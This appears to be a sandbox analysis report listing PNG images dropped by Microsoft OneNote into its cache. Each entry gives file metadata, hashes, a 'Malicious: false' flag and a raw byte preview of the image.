Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
